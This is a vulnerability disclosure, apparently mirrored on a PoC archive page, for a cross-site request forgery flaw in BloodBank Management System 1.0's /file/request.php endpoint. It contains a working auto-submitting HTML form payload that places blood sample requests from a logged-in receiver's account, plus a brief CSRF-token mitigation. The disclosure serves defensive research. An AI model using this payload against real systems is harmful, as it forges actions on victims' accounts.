关联漏洞
介绍
## **Affected Version:**
- **BloodBank Management System**: 1.0
## **Vulnerability Information:**
- **Vulnerability Type:** Cross Site Request Forgery (CSRF)
- **Severity:** HIGH
- **Status:** Unpatched
## **Vulnerable Endpoint:**
- **Path:** `file/request.php`
## **Vulnerability Description:**
There is a Cross Site Request Forgery on this endpoint `/file/request.php` which allows a remote user to initiate a `blood sample` request on the account of a `receiver` who is logged in, from the available blood sample of a selected hospital
Successful exploitation can lead to **unauthorized actions** on behalf of the victim. Additionally, this could be exploited by visiting malicious websites with the payload.
---
## **Proof of Concept (PoC):**
Below is an example of a **CSRF POC Attack** that initiates a `blood sample` request from a logged in `receiver's` account:
```html
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
```
---
## **Impact:**
- **Data Manipulation:** Attackers could modify the content displayed to users.
- **Reputational Damage:** Users may lose trust in the system due to malicious behavior.
---
## **Mitigation Recommendations:**
1. **Use CSRF Token** Implement mechanism to deter cross domain access or put `csrf tokens` in your request
---
文件快照
[4.0K] /data/pocs/d0c8ef70526a4a0d2b89ea2fde9f546b98954fe7
└── [2.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。